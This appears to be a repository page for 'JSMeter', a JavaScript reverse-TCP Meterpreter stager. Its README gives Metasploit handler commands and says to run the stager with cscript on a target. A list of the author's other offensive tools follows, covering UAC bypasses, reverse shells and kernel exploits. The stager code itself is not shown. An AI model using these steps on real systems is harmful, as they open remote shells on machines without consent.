• Stars
    star
    136
  • Rank 259,273 (Top 6 %)
  • Language
    JavaScript
  • Created about 7 years ago
  • Updated almost 7 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

JavaScript Reversed TCP Meterpreter Stager
     ____. _________   _____          __                
    |    |/   _____/  /     \   _____/  |_  ___________ 
    |    |\_____  \  /  \ /  \_/ __ \   __\/ __ \_  __ \
/\__|    |/        \/    Y    \  ___/|  | \  ___/|  | \/
\________/_______  /\____|__  /\___  >__|  \___  >__|   
                 \/         \/     \/          \/       

JavaScript Reversed TCP Meterpreter Stager - by Cn33liz 2017

CSharp Meterpreter Stager build by Cn33liz and embedded within JavaScript using DotNetToJScript from James Forshaw https://github.com/tyranid/DotNetToJScript

This Stager should run on x86 as well as x64

Usage:
Change RHOST and RPORT settings to suit your needs.

Start Msfconsole:
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp <- When run from x64 version of cscript.exe
set PAYLOAD windows/meterpreter/reverse_tcp <- When run from x86 version of cscript.exe
set LHOST 0.0.0.0
set LPORT 443
set EnableUnicodeEncoding true
set EnableStageEncoding true
set ExitOnSession false
exploit -j 

Then run: cscript.exe JSMeter.js on Target

More Repositories

1

p0wnedShell

PowerShell Runspace Post Exploitation Toolkit
C#
1,506
star
2

StarFighters

A JavaScript and VBScript Based Empire Launcher, which runs within their own embedded PowerShell Host.
Visual Basic
320
star
3

MSBuildShell

MSBuildShell, a Powershell Host running within MSBuild.exe
280
star
4

CScriptShell

CScriptShell, a Powershell Host running within cscript.exe
C#
156
star
5

TpmInitUACBypass

Bypassing User Account Control (UAC) using TpmInit.exe
C++
125
star
6

VBSMeter

VBS Reversed TCP Meterpreter Stager
Visual Basic
88
star
7

SmashedPotato

C#
82
star
8

p0wnedLoader

C#
72
star
9

p0shKiller

C++
63
star
10

HSEVD-StackOverflowX64

HackSys Extreme Vulnerable Driver - Windows 10 x64 StackOverflow Exploit with SMEP Bypass
C
63
star
11

MacroMeter

VBA Reversed TCP Meterpreter Stager
Visual Basic
63
star
12

MS17-012

MS17-012 - COM Session Moniker EoP Exploit running within MSBuild.exe
61
star
13

SharpCat

SharpCat - A Simple Reversed Command Shell which can be started using InstallUtil (Bypassing AppLocker)
C#
45
star
14

EasySystem

Quick and dirty System (Power)Shell using NamedPipe impersonation.
C
44
star
15

TpmInitUACAnniversaryBypass

Bypassing User Account Control (UAC) using TpmInit.exe
C++
43
star
16

HSEVD-ArbitraryOverwriteGDI

HackSys Extreme Vulnerable Driver - ArbitraryOverwrite Exploit using GDI
C
40
star
17

HSEVD-StackOverflow

HackSys Extreme Vulnerable Driver - StackOverflow Exploit
C
30
star
18

p0wnedReverse

PowerShell Runspace Connect-Back Shell
C#
27
star
19

HSEVD-ArbitraryOverwrite

HackSys Extreme Vulnerable Driver - ArbitraryOverwrite Exploit
C
25
star
20

HSEVD-VariousExploits

HackSys Extreme Vulnerable Driver - Various Windows 7 x86 Kernel Exploits
C
22
star
21

HSEVD-StackCookieBypass

HackSys Extreme Vulnerable Driver - StackOverflow with Stack Cookie Bypass Exploit
C
20
star
22

HSEVD-StackOverflowGDI

HackSys Extreme Vulnerable Driver - Windows 10 x64 StackOverflow Exploit using GDI
C
18
star
23

HackTheBox-Jail

HTB Jail Remote Exploit By Cneeliz - 2017
Python
16
star
24

HSEVD-ArbitraryOverwriteLowIL

HackSys Extreme Vulnerable Driver - ArbitraryOverwrite Exploit using GDI -> Low Integrity to System
C
14
star
25

HackTheBox-Smasher

Python
10
star
26

FortiParse

Fortigate Configuration Parser
Python
5
star